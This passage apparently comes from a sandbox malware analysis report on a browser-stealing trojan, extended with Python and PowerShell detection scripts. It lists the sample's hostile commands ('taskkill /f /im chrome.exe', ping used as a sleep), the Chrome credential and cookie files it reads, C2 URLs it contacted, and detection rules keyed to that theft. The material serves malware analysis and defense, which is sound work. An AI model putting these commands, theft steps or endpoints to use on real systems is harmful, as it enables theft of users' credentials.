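    return out


# Constructed bytes (not from the sample): three PEB-based checks plus one TEB read that must not match.
SAMPLE_CODE = bytes.fromhex(
    "55 8B EC"                 # push ebp; mov ebp, esp        (filler prologue)
    "64 A1 30 00 00 00"        # mov eax, fs:[30h]             -> PEB
    "0F B6 40 02"              # movzx eax, byte ptr [eax+2]   -> PEB.BeingDebugged
    "85 C0 75 10"              # test eax, eax; jnz +0x10
    "64 8B 0D 30 00 00 00"     # mov ecx, fs:[30h]
    "8B 41 68"                 # mov eax, [ecx+68h]            -> PEB.NtGlobalFlag
    "83 E0 70"                 # and eax, 70h
    "64 8B 15 30 00 00 00"     # mov edx, fs:[30h]
    "8B 42 18"                 # mov eax, [edx+18h]            -> PEB.ProcessHeap
    "64 A1 18 00 00 00"        # mov eax, fs:[18h]             -> TEB self pointer, not a PEB read
    "C3"                       # ret
)

if __name__ == "__main__":
    for h in find_peb_reads(SAMPLE_CODE):
        print(report_line(h), "->", h["field"] or "unclassified follow-up")
```

Run against the .text section of the unpacked module (read it from the PE and pass the section's virtual address as `base`) rather than the packed file on disk: the report flags "Detected unpacking", so the on-disk bytes will not contain these instructions. Reads of fs:[18h] (TEB self pointer) and fs:[0] (SEH chain) are deliberately ignored; only fs:[30h] is a PEB fetch.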
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_0043997A __EH_prolog3_GS,_memset,_memset,_memset,_memset,_memset,_memset,InitializeSecurityDescriptor,CreateWellKnownSid,CreateWellKnownSid,CreateWellKnownSid,CreateWellKnownSid,CreateWellKnownSid,CreateWellKnownSid,SetEntriesInAclW,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,SetSecurityDescriptorDacl,CoInitializeSecurity
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_004403BB __EH_prolog3_GS,GetCurrentThread,OpenThreadToken,GetLastError,GetLastError,GetCurrentProcess,OpenProcessToken,GetLastError,GetTokenInformation,GetTokenInformation,GetLastError,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid
Source: fnhcdXEfus.exe | Binary or memory string: Shell_TrayWnd
Source: fnhcdXEfus.exe | Binary or memory string: AShell_TrayWnd0x0409
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_1001779F cpuid
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_0043FC89 GetLocaleInfoW,TranslateCharsetInfo,IsValidLocale
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_0043FD0E GetLocaleInfoW
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_10017CF0 GetLocaleInfoA
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_10017CF0 GetLocaleInfoA
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe | Code function: 30_2_002B7189 GetLocaleInfoA
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_10019780 SetupDiGetDeviceRegistryPropertyA,GetLastError,_memset,SetupDiGetDeviceRegistryPropertyA
Source: C:\Windows\SysWOW64\msiexec.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\msiexec.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_00438713 __EH_prolog3_GS,GetSystemTimeAsFileTime
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_00458F45 GetVersionExW
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\hihistory
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
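Two of the behaviours above are cheap to detect from process and file telemetry and are worth more together than apart: cmd.exe launching `ping 127.0.0.1 -n 3` is a timer (ping waits about a second between echo requests, so `-n N` sleeps roughly N-1 seconds), and `taskkill /f /im chrome.exe` followed by a non-browser process opening `Login Data` or `Cookies` is the stealer releasing Chrome's lock on its SQLite profile databases before copying them. The rules below run both checks over an event stream. This is an added example written for this page, not part of the Joe Sandbox report: the event records are constructed to mirror the report's process tree, and the field names (t, type, pid, parent, image, cmdline, path) are an assumed schema, not Sysmon's or the sandbox's.

```python
"""Detection rules for ping-as-sleep and browser-kill-then-profile-read.

Added example for this report, not part of the sandbox output. SAMPLE_EVENTS is
constructed; the event schema is an assumption."""
from datetime import datetime

LOOPBACK = {"127.0.0.1", "::1", "localhost"}
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe", "opera.exe"}
# Chrome profile SQLite files the sample opened; Chrome keeps them locked while running,
# which is why a stealer kills the browser first.
PROFILE_DBS = {"login data", "cookies", "web data", "history"}
# ping.exe options that consume the next token, so that token is not mistaken for the target
PING_OPTS_WITH_ARG = {"-n", "-w", "-l", "-i", "-v", "-r", "-s", "-j", "-k", "-S"}


def _base(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _when(ev):
    return datetime.fromisoformat(ev["t"])


def parse_ping(cmdline):
    """Return (target, count) from a ping command line; count is None when -n is absent."""
    toks = cmdline.split()
    target, count, i = None, None, 1
    while i < len(toks):
        tok = toks[i]
        if tok in PING_OPTS_WITH_ARG and i + 1 < len(toks):
            if tok == "-n" and toks[i + 1].isdigit():
                count = int(toks[i + 1])
            i += 2
            continue
        if not tok.startswith("-") and not tok.startswith("/") and target is None:
            target = tok.lower()
        i += 1
    return target, count


def ping_sleep(ev):
    """Alert when cmd.exe runs ping against loopback with a repeat count: a delay, not a reachability test."""
    if ev["type"] != "process" or _base(ev["image"]) != "ping.exe":
        return None
    if _base(ev.get("parent", "")) != "cmd.exe":
        return None
    target, count = parse_ping(ev["cmdline"])
    if count is None or target not in LOOPBACK:
        return None
    return {"rule": "ping_sleep", "t": ev["t"], "pid": ev["pid"],
            "delay_s": max(count - 1, 0), "cmdline": ev["cmdline"]}


def browser_kills(events):
    """(time, browser image) for every `taskkill ... /im <browser>` in the stream."""
    out = []
    for ev in events:
        if ev["type"] == "process" and _base(ev["image"]) == "taskkill.exe":
            toks = ev["cmdline"].lower().split()
            for a, b in zip(toks, toks[1:]):
                if a == "/im" and b in BROWSERS:
                    out.append((_when(ev), b))
    return out


def profile_db_reads(events, window_s=60):
    """Alert on a non-browser process opening a Chrome profile database; note a browser kill shortly before."""
    kills = browser_kills(events)
    alerts = []
    for ev in events:
        if ev["type"] != "file":
            continue
        path = ev["path"].lower()
        if _base(ev["image"]) in BROWSERS or "\\user data\\" not in path or _base(path) not in PROFILE_DBS:
            continue
        t = _when(ev)
        recent = [b for (kt, b) in kills if 0 <= (t - kt).total_seconds() <= window_s]
        alerts.append({"rule": "browser_profile_db_read", "t": ev["t"], "pid": ev["pid"],
                       "image": ev["image"], "file": _base(path),
                       "after_browser_kill": recent[0] if recent else None})
    return alerts


def analyze(events):
    """Run both rules over an event stream and return alerts oldest first."""
    alerts = [a for a in (ping_sleep(ev) for ev in events) if a] + profile_db_reads(events)
    return sorted(alerts, key=lambda a: a["t"])


# Constructed from the report's process tree; not captured telemetry.
SAMPLE_EVENTS = [
    {"t": "2021-01-30T12:00:00", "type": "process", "pid": 39, "parent": r"C:\Windows\SysWOW64\cmd.exe",
     "image": r"C:\Windows\SysWOW64\PING.EXE", "cmdline": "ping 127.0.0.1 -n 3"},
    {"t": "2021-01-30T12:00:02", "type": "process", "pid": 49, "parent": r"C:\Windows\SysWOW64\cmd.exe",
     "image": r"C:\Windows\SysWOW64\taskkill.exe", "cmdline": "taskkill /f /im chrome.exe"},
    {"t": "2021-01-30T12:00:03", "type": "file", "pid": 20, "image": r"C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe",
     "path": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"t": "2021-01-30T12:00:03", "type": "file", "pid": 20, "image": r"C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe",
     "path": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies"},
    # benign controls: Chrome opening its own profile, and a real reachability check from a script
    {"t": "2021-01-30T12:05:00", "type": "file", "pid": 4000, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "path": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies"},
    {"t": "2021-01-30T12:05:01", "type": "process", "pid": 4100, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\PING.EXE", "cmdline": "ping -n 1 -w 500 10.0.0.1"},
]

if __name__ == "__main__":
    for a in analyze(SAMPLE_EVENTS):
        print(a)
```

The ping rule on its own is noisy in environments where batch scripts use the same idiom for benign delays; its value here is as context for the second rule, which fires only for a non-browser image touching the profile databases, and reports the browser kill that preceded it. A backup agent reading `Cookies` would fire the second rule without the kill context, which is the case to whitelist rather than loosen the rule.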

Mitre Att&ck Matrix

Techniques are listed per tactic in the report's column order. A number in parentheses is the count the report attaches to that technique (matching signatures); entries without a number are the matrix template with no hit for this sample.

Initial Access: Replication Through Removable Media (1); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools
Execution: Windows Management Instrumentation (1); Native API (1); Command and Scripting Interpreter (2); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell; AppleScript; Windows Command Shell
Persistence: DLL Side-Loading (1); Application Shimming (1); Browser Extensions (1); Bootkit (1); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows); Cron
Privilege Escalation: DLL Side-Loading (1); Application Shimming (1); Access Token Manipulation (1); Process Injection (12); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows); Cron
Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); Install Root Certificate (2); Software Packing (1); DLL Side-Loading (1); Masquerading (1); Virtualization/Sandbox Evasion (13); Access Token Manipulation (1); Process Injection (12); Bootkit (1)
Credential Access: OS Credential Dumping (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture
Discovery: System Time Discovery (1); Peripheral Device Discovery (11); File and Directory Discovery (3); System Information Discovery (59); Query Registry (2); Security Software Discovery (461); Virtualization/Sandbox Evasion (13); Process Discovery (4); Remote System Discovery (11); System Network Configuration Discovery (1); Permission Groups Discovery
Lateral Movement: Replication Through Removable Media (1); Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools; Taint Shared Content; Replication Through Removable Media
Collection: Archive Collected Data (1); Man in the Browser (1); Data from Local System (1); Clipboard Data (1); Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unenc

rypted/Obfuscated Non-C2 Protocol; Exfiltration Over Physical Medium
Command and Control: Ingress Tool Transfer (1); Encrypted Channel (2); Non-Application Layer Protocol (3); Application Layer Protocol (13); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: System Shutdown/Reboot (1); Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction; Data Encrypted for Impact; Service Stop

Behavior Graph

Behavior Graph ID: 346325 | Sample: fnhcdXEfus.exe | Start date: 30/01/2021 | Architecture: WINDOWS | Score: 90

Process tree reconstructed from the graph (numbers in brackets are the graph's node ids, not PIDs):

Start
  signatures: Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; Uses ping.exe to sleep; 3 other signatures
  fnhcdXEfus.exe [8]
    network: c8dd8ae6dc4dc644.xyz, 34.94.64.66, ports 49719, 49722, 49723, GOOGLEUS, United States
    dropped: C:\Users\user\...\63C4F3D9EA0CC861.exe (PE32); C:\...\63C4F3D9EA0CC861.exe:Zone.Identifier (ASCII)
    signatures: Detected unpacking (creates a PE file in dynamic memory); Installs new ROOT certificates; Contains functionality to infect the boot sector; 4 other signatures
    63C4F3D9EA0CC861.exe [15]
      network: c8dd8ae6dc4dc644.xyz; C8DD8AE6DC4DC644.xyz
      dropped: C:\Users\user\AppData\...\1612045890161.exe (PE32); C:\Users\user\AppData\Local\Temp\xldl.dll (PE32); C:\Users\user\AppData\Local\...\zlib1.dll (PE32); 7 other files (none is malicious)
      signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Contains functionality to infect the boot sector; Contains functionality to detect sleep reduction / modifications
      cmd.exe [26]
        conhost.exe [41]
        PING.EXE [43]
      1612045890161.exe [29]
      ThunderFW.exe [31]
    63C4F3D9EA0CC861.exe [20]
      network: c8dd8ae6dc4dc644.xyz
      dropped: C:\Users\user\AppData\...\Secure Preferences (UTF-8); C:\Users\user\AppData\Local\...\Preferences (ASCII)
      signatures: Tries to harvest and steal browser information (history, passwords, etc)
      cmd.exe [33]
        signatures: Uses ping.exe to sleep
        conhost.exe [45]
        PING.EXE [47]
      cmd.exe [35]
        taskkill.exe [49]
        conhost.exe [51]
    cmd.exe [22]
      network: 127.0.0.1 (unknown, unknown)
      signatures: Uses ping.exe to sleep
      conhost.exe [37]
      PING.EXE [39]
    msiexec.exe [24]
      dropped: C:\Users\user\AppData\Local\...\MSI6DDB.tmp (PE32)
  msiexec.exe [13]
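The graph attaches "Installs new ROOT certificates" to the first fnhcdXEfus.exe process. On a host where this sample ran, the first thing to establish is which root landed in which store, since a root in the user store lets the installing account be intercepted without touching the machine store. The script below enumerates both Root stores newest-first and diffs them against a thumbprint list captured on a clean build. It is an added example written for this page, not part of the Joe Sandbox report; `$BaselinePath` is an assumption and should point at wherever the clean-host list is kept.

```powershell
# Added example (not from the Joe Sandbox report): enumerate the Root stores the sample
# could have written to and diff them against a baseline captured on a clean build.
# $BaselinePath is an assumption: one thumbprint per line, produced by the first run on a clean host.
$BaselinePath = 'C:\IR\root-thumbprints.txt'

$roots = foreach ($store in 'Cert:\LocalMachine\Root', 'Cert:\CurrentUser\Root') {
    Get-ChildItem -Path $store | ForEach-Object {
        [pscustomobject]@{
            Store      = $store
            Thumbprint = $_.Thumbprint
            Subject    = $_.Subject
            SelfSigned = ($_.Subject -eq $_.Issuer)   # a genuine root is self-signed; anything else in Root is odd
            NotBefore  = $_.NotBefore
            NotAfter   = $_.NotAfter
        }
    }
}

# Newest first: a root whose NotBefore sits near the incident date is the first one to look at.
$roots | Sort-Object NotBefore -Descending | Select-Object -First 10 | Format-Table -AutoSize

if (Test-Path $BaselinePath) {
    $known   = Get-Content $BaselinePath
    $unknown = $roots | Where-Object { $known -notcontains $_.Thumbprint }
    if ($unknown) {
        Write-Warning 'Root certificates not present in the baseline:'
        $unknown | Format-List Store, Subject, Thumbprint, SelfSigned, NotBefore, NotAfter
    } else {
        Write-Output 'No root certificates outside the baseline.'
    }
} else {
    # First run on a known-clean host: record what is there so later runs can diff against it.
    $roots | ForEach-Object { $_.Thumbprint } | Sort-Object -Unique | Set-Content $BaselinePath
    Write-Output "Baseline written to $BaselinePath"
}

# The same stores as raw registry blobs, for hosts where only registry collection is available:
#   HKLM:\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates
#   HKCU:\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates
```

Roots delivered by Windows' automatic root update land in the AuthRoot store, not Root, so the Root stores change rarely on a managed build and the diff stays quiet. A certificate found only in `Cert:\CurrentUser\Root` is the case to look at first: it needed no elevation to install, and the report shows the sample running as the desktop user.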


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
fnhcdXEfus.exe | 74% | Virustotal | -
fnhcdXEfus.exe | 35% | Metadefender | -
fnhcdXEfus.exe | 83% | ReversingLabs | Win32.Trojan.Mingloa
fnhcdXEfus.exe | 100% | Joe Sandbox ML | -

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | 100% | Joe Sandbox ML | -
C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | 35% | Metadefender | -
C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | 83% | ReversingLabs | Win32.Trojan.Mingloa
C:\Users\user\AppData\Local\Temp\MSI6DDB.tmp | 0% | Metadefender | -
C:\Users\user\AppData\Local\Temp\MSI6DDB.tmp | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe | 8% | Metadefender | -
C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe | 3% | Metadefender | -
C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe | 2% | ReversingLabs | -
C:\Users\user\AppData\Local\Temp\download\atl71.dll | 3% | Metadefender | -
C:\Users\user\AppData\Local\Temp\download\atl71.dll | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll | 3% | Metadefender | -
C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\Temp\download\download_engine.dll | 0% | Metadefender | -
C:\Users\user\AppData\Local\Temp\download\download_engine.dll | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\Temp\download\msvcp71.dll | 0% | Metadefender | -
C:\Users\user\AppData\Local\Temp\download\msvcp71.dll | 3% | ReversingLabs | -
C:\Users\user\AppData\Local\Temp\download\msvcr71.dll | 0% | Metadefender | -
C:\Users\user\AppData\Local\Temp\download\msvcr71.dll | 3% | ReversingLabs | -
C:\Users\user\AppData\Local\Temp\download\zlib1.dll | 0% | Metadefender | -
C:\Users\user\AppData\Local\Temp\download\zlib1.dll | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\Temp\xldl.dll | 3% | Metadefender | -
C:\Users\user\AppData\Local\Temp\xldl.dll | 0% | ReversingLabs | -
C:\Users\user\AppData\Roaming\1612045890161.exe | 3% | Metadefender | -
C:\Users\user\AppData\Roaming\1612045890161.exe | 14% | ReversingLabs | Win32.Infostealer.EdgeCookiesView

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label
http://C8DD8AE6DC4DC644.xyz/info_old/ddd | 1% | Virustotal | -
http://C8DD8AE6DC4DC644.xyz/info_old/ddd | 0% | Avira URL Cloud | safe
http://www.interoperabilitybridges.com/wmp-extension-for-chromeH | 0% | Avira URL Cloud | safe
https://deff.nelreports.net/api/report?cat=msn | 0% | Avira URL Cloud | safe
https://twitter.comsec-fetch-dest: | 0% | Avira URL Cloud | safe
http://www.interoperabilitybridges.com/wmp-extension-for-chrome | 0% | URL Reputation (listed 3 times) | safe
http://ocsp.pki.goog/gts1o1core0 | 0% | URL Reputation (listed 3 times) | safe
http://crl.pki.goog/GTS1O1core.crl0 | 0% | URL Reputation (listed 3 times) | safe
http://ocsp.pki.goog/GTSGIAG30 | 0% | Avira URL Cloud | safe
https://logincdn.msauth.net/16.000/Converged_v21033_-0mnSwu67knBd7qR7YN9GQ2.css | 0% | Avira URL Cloud | safe
https://logincdn.msauth.net/16.000.28666.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc1937 | 0% | Avira URL Cloud | safe
https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b5 | 0% | Avira URL Cloud | safe
http://pki.goog/gsr2/GTS1O1.crt0 | 0% | URL Reputation (listed 3 times) | safe
http://ocsp.pki.goog/gsr202 | 0% | URL Reputation (listed 3 times) | safe
https://pki.goog/repository/0 | 0% | URL Reputation (listed 3 times) | safe
http://crl.pki.goog/gsr2/gsr2.crl0? | 0% | URL Reputation (listed 3 times) | safe
http://pki.goog/gsr2/GTSGIAG3.crt0) | 0% | Avira URL Cloud | safe
https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie: | 0% | Avira URL Cloud | safe
http://C8DD8AE6DC4DC644.xyz/info_old/w | 0% | Avira URL Cloud | safe
http://c8dd8ae6dc4dc644.xyz//fine/send | 0% | Avira URL Cloud | safe
http://pki.goog/gsr2/GTS1O1.crt0# | 0% | Avira URL Cloud | safe
http://c8dd8ae6dc4dc644.xyz/info_old/r | 0% | Avira URL Cloud | safe
https://aefd.nelreports.net/api/report?cat=bingth | 0% | Avira URL Cloud | safe
http://c8dd8ae6dc4dc644.xyz/info_old/e | 0% | Avira URL Cloud | safe
https://exchangework%04d%02d%02d.xyz/http://changenewsys%04d%02d%02d.xyz/post_info. | 0% | Avira URL Cloud | safe
http://c8dd8ae6dc4dc644.xyz/info_old/g | 0% | Avira URL Cloud | safe
https://www.instagram.comsec-fetch-mode: | 0% | Avira URL Cloud | safe
https://twitter.comReferer: | 0% | Avira URL Cloud | safe
http://www.interestvideo.com/video1.php | 0% | Avira URL Cloud | safe
http://C8DD8AE6DC4DC644.xyz:80/info_old/r | 0% | Avira URL Cloud | safe
http://C8DD8AE6DC4DC644.xyz:80/info_old/w | 0% | Avira URL Cloud | safe
http://crl.pki.goog/GTSGIAG3.crl0 | 0% | Avira URL Cloud | safe
https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gt | 0% | Avira URL Cloud | safe
https://1A469593C1FE15DC.xyz/ | 0% | Avira URL Cloud | safe
http://ocsp.thawte.com0 | 0% | URL Reputation (listed 3 times) | safe
https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en_5QoHC_ilFOmb96M0pIeJ | 0% | Avira URL Cloud | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
C8DD8AE6DC4DC644.xyz | 34.94.64.66 | true | false | - | unknown
c8dd8ae6dc4dc644.xyz | 34.94.64.66 | true | false | - | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://C8DD8AE6DC4DC644.xyz/info_old/ddd | false | 1% Virustotal; Avira URL Cloud: safe | unknown
http://c8dd8ae6dc4dc644.xyz//fine/send | false | Avira URL Cloud: safe | unknown
http://c8dd8ae6dc4dc644.xyz/info_old/w | false | - | unknown
http://c8dd8ae6dc4dc644.xyz/info_old/r | false | Avira URL Cloud: safe | unknown
http://c8dd8ae6dc4dc644.xyz/info_old/e | false | Avira URL Cloud: safe | unknown
http://c8dd8ae6dc4dc644.xyz/info_old/g | false | Avira URL Cloud: safe | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplate | ecvB803.tmp.11.dr | false | - | high
https://duckduckgo.com/chrome_newtab | 63C4F3D9EA0CC861.exe, 00000003.00000003.284978493.000000000072F000.00000004.00000001.sdmp, Web Data1612045902911.3.dr | false | - | high
https://duckduckgo.com/ac/?q= | 63C4F3D9EA0CC861.exe, 00000003.00000003.284978493.000000000072F000.00000004.00000001.sdmp, Web Data1612045902911.3.dr | false | - | high
http://www.interoperabilitybridges.com/wmp-extension-for-chromeH | 63C4F3D9EA0CC861.exe, 00000003.00000003.284658762.0000000003F02000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://www.messenger.com/ | 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | false | - | high
http://www.msn.com | ecvB803.tmp.11.dr | false | - | high
http://www.nirsoft.net | 1612045890161.exe, 0000000B.00000002.267608441.0000000000198000.00000004.00000010.sdmp | false | - | high
https://deff.nelreports.net/api/report?cat=msn | ecvB803.tmp.11.dr | false | Avira URL Cloud: safe | unknown
https://twitter.com/ookie: | 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | false | - | high
https://twitter.comsec-fetch-dest: | 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0f | ecvB803.tmp.11.dr | false | - | high
http://www.interoperabilitybridges.com/wmp-extension-for-chrome | 63C4F3D9EA0CC861.exe, 00000003.00000003.284658762.0000000003F02000.00000004.00000001.sdmp | false | URL Reputation (listed 3 times): safe | unknown
http://ocsp.pki.goog/gts1o1core0 | ecvB803.tmp.11.dr | false | URL Reputation (listed 3 times): safe | unknown
https://maps.windows.com/windows-app-web-link | ecvB803.tmp.11.dr | false | - | high
http://www.msn.com/?ocid=iehp | ecvB803.tmp.11.dr | false | - | high
https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=68568119166 | ecvB803.tmp.11.dr | false | - | high
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3 | ecvB803.tmp.11.dr | false | - | high
https://srtb.msn.com/auction?a=de-ch&b=a8415ac9f9644a1396bc1648a4599445&c=MSN&d=http%3A%2F%2Fwww.msn | ecvB803.tmp.11.dr | false | - | high
http://crl.pki.goog/GTS1O1core.crl0 | ecvB803.tmp.11.dr | false | URL Reputation (listed 3 times): safe | unknown
https://www.messenger.com | 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | false | - | high
http://www.nirsoft.net/ | 1612045890161.exe, 1612045890161.exe.3.dr | false | - | high
http://forms.real.com/real/realone/download.html?type=rpsp_us | 63C4F3D9EA0CC861.exe, 00000003.00000003.284546923.0000000003F0F000.00000004.00000001.sdmp | false | - | high
http://ocsp.pki.goog/GTSGIAG30 | ecvB803.tmp.11.dr | false | Avira URL Cloud: safe | unknown
https://www.instagram.com/graphql/query/?query_hash=149bef52a3b2af88c0fec37913fe1cbc&variables=%7B%2 | 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | false
                                          high
                                          https://logincdn.msauth.net/16.000/Converged_v21033_-0mnSwu67knBd7qR7YN9GQ2.cssecvB803.tmp.11.drfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe63C4F3D9EA0CC861.exe, 00000003.00000003.364210797.000000000394C000.00000004.00000040.sdmpfalse
                                            high
                                            https://logincdn.msauth.net/16.000.28666.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc1937ecvB803.tmp.11.drfalse
                                            • Avira URL Cloud: safe
                                            unknown
